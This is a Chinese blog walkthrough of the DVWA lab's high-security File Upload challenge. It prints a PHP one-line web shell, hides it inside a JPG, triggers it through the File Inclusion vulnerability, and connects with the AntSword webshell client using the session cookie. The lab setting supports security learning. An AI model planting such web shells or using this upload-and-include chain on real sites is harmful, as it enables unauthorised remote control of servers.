1.对于这个关卡大部分人都是使用菜刀这个软件来进行连接的,所以对于蚁剑的连接使用有点少,而且蚁剑的连接相对麻烦一些。
选择DVWA Security,把impossible改成high(其他模式也改成high),改好之后再选择File Upload,如果把安全等级调成高了以后,我们只能上传像jpg,png,jpeg(这种后缀的)的图片,而且注意,上传的高度不能超过100KB,如果想要了解的,可以查看网页源代码或者看一下https://blog.csdn.net/weixin_39190897/article/details/86772765
这位大佬里面有源代码的解释,而且对high通过的解释非常详细,不过他最终没能连上蚁剑,我也是之后查看了一下别人的才知道他为什么没有连上,下面再详细说明。
我们想要被蚁剑控制还是需要木马,这里使用php文件的一句话木马,创建一个php文件,我创建了一个名叫 luyi.php的php文件
<?php @eval($_POST['pass']);?>插入了这个代码,这个代码的eval()表示语句字符串什么的都当中代码使用,其实这句话简单来说就是给木马设置了一个密码为pass,然后我们再在我们自己的电脑图库里面选择一张jpg图片,这里也是需要注意的地方,有一些博主说对图片插入一句话木马(就是我们上面的那句),用记事本插入,这个插入的位置很关键,可能要插在中间也可能要插在最后一行,也可能是开头,总之插在哪里不会对图片造成破坏导致图片破损就插在哪里。如果损坏是传不上去的。
这里给一个建议使用edjepcom插入一句话木马小工具来插入一句话木马,就是下载好之后把图片拖到这个程序的就可以编译了。这样可以保证图片不损坏。
之后我们还要保证php文件和jep图片是要在同一个目录下面的
我就把他们都放到了D盘的目录下面,然后我们在最上面输入cmd,打开命令提示符,使用下面的命令来将两个文件合并成一个luyixuan.jpg图片,这就是我们需要上传的文件
我们回到dvwa页面上传我们这个文件
上传成功了以后会出现../../hackable/uploads/luyixuan.jpg,这是我们之后需要拼接的文件路径之一,其中..代表返回上一级目录,这里有两个所以要返回两个上级目录,我们接下来对于文件上传有点没办法了,我们只能换一下,换成上面那个File Inclusion,去用那个漏洞来执行一下。那么选择文件包含,修改page后面的内容,这个可以随便一下不过要是page=file://+你自己想要的路径可以是跟着../../hackable/uploads/luyixuan.jpg
修改完了以后会显示这个,这是因为你的上传路径有问题,这里是路径是D:\phpStudy\PHPTutorial\WWW\vulnerabilities\fi\index.php,我们结合一下上面我说的需要拼接的路径,加上返回上级目录,那么就是D:\phpStudy\PHPTutorial\WWW\hackable\luyixuan.jpg,我们把这句话接入到page=file://后面
出现了这些东西说明我们已经在连接了,如果是菜刀的话,这里已经game over了,直接用这个地址去连接,密码是pass,差不多按照操作就可以搞定了,但是蚁剑却比这个复杂,打开蚁剑
右键选择添加数据
输入url地址和密码(你之前的那个php木马里面的东西),然后点测试连接。
神奇的是,会提示你返回数据为空,这是为什么呢?这就是我推荐的那位博主卡住的地方,是因为蚁剑需要获得相应的cookie才能连接上,具体原因和方法你可以看https://blog.csdn.net/qq_39174983/article/details/111983259
,这位大佬写的博客,也可以继续看我怎么做的,之后我们选择我们添加的数据,右键选择浏览网站,跳转后,然后点击浏览按钮,
会到这个页面,输入我们的账号admin,密码password,登录成功以后把安全等级从不可能修改成high,然后退出保存一下cookie即可
看到了吗?security的value变成了high,一开始是impossible的,然后点击浏览旁边的保存,就保存成功了。
最后我们点击我们上传的数据
成功连接了,看着很复杂,把逻辑理顺了,其实也还行,第一次写文章,觉得写的好的,就参考一下,觉得写的不好的,可以在下面评论一下,看看我应该在哪个地方改一下,感谢大家
扫一扫
345
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
